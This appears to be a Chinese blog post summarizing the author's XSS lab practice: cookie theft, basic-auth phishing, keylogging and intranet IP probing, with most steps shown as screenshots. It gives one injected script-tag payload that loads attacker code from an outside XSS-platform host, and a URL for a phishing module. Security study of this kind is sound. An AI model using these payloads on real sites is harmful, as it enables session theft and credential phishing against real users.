评论

收藏

[其他] XSS这段时间的学习总结

网络安全 网络安全 发布于:2021-07-17 19:49 | 阅读数:643 | 评论:0

0X01利用平台payload获取COOKIE
本机IP 192.168.1.100
靶机win7 192.168.1.102
我们先创建一个cookie的项目
DSC0000.png

然后在可以执行xss的地方插入我们的恶意代码
</tExtArEa>'"><sCRiPt sRC=https://xsshs.cn/JBYE></sCrIpT>
DSC0001.png

可以看见成功回显
DSC0002.png


0X02基础认证钓鱼
这里因为回家了 所以ip变化了一下
本机 192.168.1.10
靶机 192.168.1.2
这是我们的平台的地址
http://xss.fbisb.com/xss.php?do=module&act=view&id=15
我们一样先建一个项目 然后对靶机进行钓鱼
DSC0003.png

DSC0004.png

然后输入后 我们返回来看我们的项目
DSC0005.png

成功钓鱼

0X03XSS键盘记录仪
还是先创建一个项目
然后 在可以植入XSS的地方植入XSS代码
DSC0006.png
DSC0007.png

成功获取键盘记录

0X04内网IP探测
创建项目
然后一样插入到可以执行js的地方
DSC0008.png




关注下面的标签,发现更多相似文章